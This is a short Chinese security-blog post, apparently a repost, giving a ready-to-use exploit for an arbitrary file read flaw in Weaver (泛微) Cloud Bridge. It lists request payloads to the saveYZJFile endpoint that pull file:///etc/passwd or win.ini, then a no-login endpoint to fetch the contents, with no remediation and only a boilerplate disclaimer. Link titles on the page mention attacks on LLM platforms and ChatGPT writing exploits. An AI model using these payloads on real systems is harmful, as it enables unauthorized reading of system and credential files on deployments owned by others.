泛微云桥任意文件读取

admin

139336
文章

114
评论

2020年9月13日09:00:50评论578 views字数 329阅读1分5秒阅读模式

点击蓝字 · 关注我们

漏洞标题

泛微云桥任意文件读取

生成文件id

0x01 payload

Linux：

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

Windows：

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt

获取文件内容

Payload：/file/fileNoLogin/{id值}

Linux复现

泛微云桥任意文件读取

Windows复现

泛微云桥任意文件读取

关注EDI安全，获取更多HVV情报

EDI安全

扫二维码｜关注我们

一个专注渗透实战经验分享的公众号

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Spring Actuator 暴露在攻防中的利用

关于一次dify的渗透

云上LLM数据泄露风险研究系列（二）：基于LLMOps平台的攻击面分析

【渗透测试】Dripping Blues: 1靶场渗透测试

大模型10大网络安全威胁及防范策略 | ChatGPT在公开漏洞利用代码发布前成功生成CVE有效攻击程序

MCP协议的威胁建模，基于MAESTRO框架

利用空字节写入漏洞攻击 Synology DiskStation

我如何使用 ChatGPT 在 45 分钟内发现反射型 XSS 漏洞 — — 并赚取 800 美元

【漏洞实战】我是如何突破层层限制利用ssrf的

记一次域渗透实战：Entra SSO功能的滥用

本文由 admin 发表于 2020年9月13日09:00:50
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
泛微云桥任意文件读取https://cn-sec.com/archives/130669.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

泛微云桥任意文件读取

Spring Actuator 暴露在攻防中的利用

关于一次dify的渗透

云上LLM数据泄露风险研究系列（二）：基于LLMOps平台的攻击面分析

【渗透测试】Dripping Blues: 1靶场渗透测试

大模型10大网络安全威胁及防范策略 | ChatGPT在公开漏洞利用代码发布前成功生成CVE有效攻击程序

MCP协议的威胁建模，基于MAESTRO框架

利用空字节写入漏洞攻击 Synology DiskStation

我如何使用 ChatGPT 在 45 分钟内发现反射型 XSS 漏洞 — — 并赚取 800 美元

【漏洞实战】我是如何突破层层限制利用ssrf的

记一次域渗透实战：Entra SSO功能的滥用

发表评论

在线咨询

微信